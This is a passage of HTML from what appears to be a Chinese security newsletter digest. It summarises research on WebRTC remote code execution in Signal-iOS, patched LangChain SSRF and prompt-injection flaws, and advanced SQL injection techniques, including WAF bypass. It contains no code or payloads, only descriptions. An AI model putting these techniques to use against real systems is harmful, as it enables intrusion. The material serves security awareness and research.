auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WebRTC 中的 RCE 漏洞：第一部分</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Signal 的 WebRTC 通话库漏洞研究：深入研究</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46WShEXiahZnYuPkVlbJZ6SrmXiaEicVo0NGqeW2xpBEsZNxCx6IRJvJAVQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46WShEXiahZnYuPkVlbJZ6SrmXiaEicVo0NGqeW2xpBEsZNxCx6IRJvJAVQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855411554828122"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WebRTC 是一个复杂的实时通信工具库，它处理音视频通话，是一个值得研究的目标，因为它涉及解析序列化数据和维护状态协议，这些都是复杂的任务。   </section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Signal-iOS 的复杂性和 iOS 的特性使得对这些应用程序的安全研究变得具有挑战性。   </section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过注入合成的漏洞和使用 Frida 等工具，研究人员可以更深入地了解 Signal 和 WebRTC 的内部工作机制，以及如何在 iOS 上进行漏洞利用。   </section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">构建一个 ARM64 ROP 链是实现远程代码执行的关键步骤，它需要精心设计，包括条件循环和堆栈偏移技术。   </section></li></ul>
	<br/>
	<p>🏷️: WebRTC, Signal, iOS, 网络安全, 远程代码执行</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 LangChain开源生成式AI框架中的漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Palo Alto Networks 的研究人员发现了 LangChain 中两个重要的安全漏洞，分别是服务器端请求伪造（SSRF）和提示注入漏洞，已经得到了修补。这些漏洞可能允许攻击者执行任意代码和访问敏感数据。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.975" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=970a7ffa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46jicXZsW5ibTu21ibibvu2oByFicVcGRWeeEa8J8a3HceqZz7I3tV0eDxibqQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5259259259259259" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=2540c9b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46AaH283LmXTGb17d0XdHPuUI9Ziblxj1ILeWFibqbDiauoWQWawvfYVibtw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.39272030651340994" data-w="1044" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=9e7f4883&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46pyfOGKzzDV2Fm6jyen4bM2TfWzo5VzXPG7tpknKFD0CY4KOo68t5CQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开源 AI 工具 LangChain 曝出漏洞，CVE-2023-46229 和 CVE-2023-44467 影响 LLM 构建</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Y1vO9wAUJjBG36v21JbkUbKm7LL9TnYzBiaXILoXicicPWiaUkrMHGMs7g/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Y1vO9wAUJjBG36v21JbkUbKm7LL9TnYzBiaXILoXicicPWiaUkrMHGMs7g/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855411545415881"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LangChain 的生成式人工智能框架在开发者中非常流行，但其安全漏洞可能导致敏感数据泄露和任意代码执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">研究人员强调了在使用大型语言模型时，对用户输入进行严格验证和清理的重要性，以防止恶意的提示注入攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管 LangChain Experimental 提供了强大的功能，但开发者在使用该库时必须谨慎，并采取适当的措施来减少被植入恶意代码的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Palo Alto Networks 提供了一系列产品和服务来保护其客户免受这些漏洞的攻击，包括但不限于下一代防火墙、Cortex XDR 和 Prisma Cloud。</section></li></ul>
	<br/>
	<p>🏷️: LangChain, AI, 漏洞, Palo Alto Networks</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 高级SQL注入技术</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">这篇网页内容主要介绍了一系列高级的 SQL 注入技术，包括错误注入、联合查询、盲注入、二次注入以及如何绕过 WAF 和自动化工具的使用。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4b9766c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46m4aTlp6OOFCu1SReBjnib6G7KUicYBBJKBExfqvGmt2A5hGEJPTbhia2g%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:sqli的一些基础知识</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开源高级 SQL 注入技巧仓库</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46VOEyHsBZ9G2KeVogo6C3IKz3GY7AlCC60dmhWx9YicXBMXzsvXAfwQg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46VOEyHsBZ9G2KeVogo6C3IKz3GY7AlCC60dmhWx9YicXBMXzsvXAfwQg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122488242821454"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">合法和授权的测试：网页强调高级 SQL 注入技术应该仅在合法和授权的测试环境中使用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">高级注入技术的多样性：文章展示了多种高级注入技术，包括错误注入、联合查询注入、盲注入和二次注入等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">自动化和定制化工具的重要性：提到了自动化工具如 SQLMap 和自定义 Python 脚本的使用，以及如何编写定制的篡改脚本来绕过 WAF。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">数据库特定的攻击方法：文章指出了不同 DBMS（如 MySQL、PostgreSQL、MSSQL、Oracle 和 SQLite）的特定攻击方法和错误生成技术。</section></li></ul>
	<br/>
